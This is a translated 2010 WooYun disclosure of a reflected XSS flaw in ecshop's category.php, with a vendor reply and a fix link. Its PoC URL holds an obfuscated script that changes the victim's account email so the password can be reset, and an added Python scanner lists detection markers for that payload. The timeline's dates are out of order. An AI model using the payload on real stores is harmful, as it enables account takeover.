XSS exploitation of the "ecshop arbitrary user password change vulnerability"

ID: 401
URL: http://www.wooyun.org/bug.php?action=view&id=401
Status: vendor confirmed
Title: XSS exploitation of the "ecshop arbitrary user password change vulnerability"
Type: XSS (cross-site scripting)
Vendor: ShopEx
White hat: blue
Submitted: 2010-09-02 20:17:00
Published: 2010-10-02 21:00:00
Fixed: (not set)
Confirmed: 2010-09-03 00:00:00
Confirm Spend: 1
Tags: reflected XSS, XSS exploitation technique
Followers: 0
Favorites: 0
White hat rating
White hat self-assessed rank: 10
Vendor rating
Vendor-assessed rank: 8
Summary
ecshop currently has a reflected XSS that is exploitable; if custom development on top of it introduces further XSS or CSRF problems, the exploitation potential grows. (I have run into this problem before and suffered a little from it.)
Details

Use the XSS to construct a POST that submits a profile edit, change the account email to an address the attacker controls, then use the password recovery function.

PoC

http://localhost/test/ecshop_gbk272/category.php?id=3&price_min=0&price_max=0&filter_attr=0.0.0.199%22%3E%3Cscript%3Eeval%28String.fromCharCode%28120,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,46,111,112,101,110,40,34,112,111,115,116,34,44,34,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,47,116,101,115,116,47,101,99,115,104,111,112,95,103,98,107,50,55,50,47,117,115,101,114,46,112,104,112,34,41,59,120,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,59,120,46,115,101,110,100,40,34,97,99,116,61,97,99,116,95,101,100,105,116,95,112,114,111,102,105,108,101,38,101,109,97,105,108,61,120,120,120,64,49,54,51,46,99,111,109,34,41,59%29%29%3C/script%3E%3C%22


Of course, exploitation via file inclusion is more concise.
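As an added example that is not part of this report, the following Python script shows what a defender would look for in web-server access logs after reading the PoC above: a category.php request whose filter_attr parameter is not the dot-separated list of numeric ids ecshop expects and instead carries script markers. The log lines are constructed, and the expected filter_attr format and the marker list are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache common log format). Line 2 is a
# shortened form of the report's PoC request: the character-code list is cut
# down, since only the request structure matters for detection.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Sep/2010:20:17:01 +0800] "GET /test/ecshop_gbk272/category.php?id=3&price_min=0&price_max=0&filter_attr=0.0.0.199 HTTP/1.1" 200 5120
10.0.0.9 - - [02/Sep/2010:20:17:09 +0800] "GET /test/ecshop_gbk272/category.php?id=3&price_min=0&price_max=0&filter_attr=0.0.0.199%22%3E%3Cscript%3Eeval%28String.fromCharCode%28120,61,110%29%29%3C/script%3E%3C%22 HTTP/1.1" 200 5130
10.0.0.7 - - [02/Sep/2010:20:18:00 +0800] "POST /test/ecshop_gbk272/user.php HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate filter_attr is a dot-separated list of integer
# attribute ids, e.g. 0.0.0.199. Anything else is unexpected input.
FILTER_ATTR_RE = re.compile(r'^\d+(\.\d+)*$')
# Markers typical of the script-injection payload shown in the PoC.
SCRIPT_MARKERS = ('<script', 'string.fromcharcode', 'eval(', 'xmlhttprequest')


def filter_attr_is_valid(value: str) -> bool:
    return FILTER_ATTR_RE.fullmatch(value) is not None


def inspect_request(target: str):
    """Return a reason string if the request target looks suspicious, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/category.php'):
        return None
    # parse_qs already percent-decodes the values, so %3C becomes '<' here.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get('filter_attr', []):
        if filter_attr_is_valid(value):
            continue
        lowered = value.lower()
        hits = [m for m in SCRIPT_MARKERS if m in lowered]
        return 'script markers: ' + ', '.join(hits) if hits else 'malformed filter_attr'
    return None


def scan_log(text: str):
    """Return [(line_number, reason)] for every suspicious request in the log."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            reason = inspect_request(m.group('target'))
            if reason:
                findings.append((lineno, reason))
    return findings
```

The same check, applied server-side before filter_attr is echoed into the page, rejects the request instead of merely flagging it.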

Fix

See: http://www.wooyun.org/bug.php?action=view&id=395

Status history: 2010-09-02: Details sent to the vendor, awaiting vendor handling
2010-09-03: Vendor confirmed; details disclosed only to the vendor
2010-09-06: Details opened to third-party security partners
2010-10-28: Details disclosed to core white hats and experts in related fields
2010-11-07: Details disclosed to regular white hats
2010-11-17: Details disclosed to intern white hats
2010-10-02: Details disclosed to the public
Vendor reply: Filtering is insufficient; a fix is in progress.
Response info: Severity: Medium; Vulnerability rank: 8; Confirmed: 2010-09-03 13:43